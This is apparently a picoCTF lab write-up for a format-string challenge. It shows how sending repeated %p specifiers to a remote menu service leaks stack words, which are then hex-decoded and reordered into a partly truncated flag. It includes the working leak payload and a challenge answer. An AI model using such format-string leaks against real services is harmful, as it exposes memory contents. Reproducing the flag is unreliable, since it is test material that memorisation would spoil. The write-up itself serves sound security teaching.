Description
Patrick and Sponge Bob were really happy with those orders you made for them, but now they're curious about the secret menu. Find it, and along the way, maybe you'll find something else of interest!
Setup
Netcat + CyberChef
Download the binary/source for local testing, then connect to the remote menu with netcat.
Have CyberChef (or another hex→ASCII tool) ready to decode the leaked pointers.
wget https://artifacts.picoctf.net/c_mimas/50/vuln && \
wget https://artifacts.picoctf.net/c_mimas/50/vuln.c && \
nc mimas.picoctf.net 57322
Solution
This builds on format string 0 by requiring you to leak stack data instead of just selecting menu items. Once you master stack leaks, advance to format string 2 to learn memory overwrites with pwntools.
- Step 1Spray the stackSend a payload of repeated %p separated by commas to dump many stack words at once.%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
- Step 2Filter the useful wordsAmong the outputs you'll see 0x7b4654436f636970 etc. These 0x-prefixed pointers are ASCII chunks of the flag, but they appear in reverse order.
- Step 3Decode and reorderCopy the five flag dwords into CyberChef, apply From Hex then Reverse. Reordering the chunks (last to first) yields picoCTF{7y13_4x4_f14g_b54n1m41_5d7...}.
Flag
picoCTF{7y13_4x4_f14g_b54n1m41_5d7...}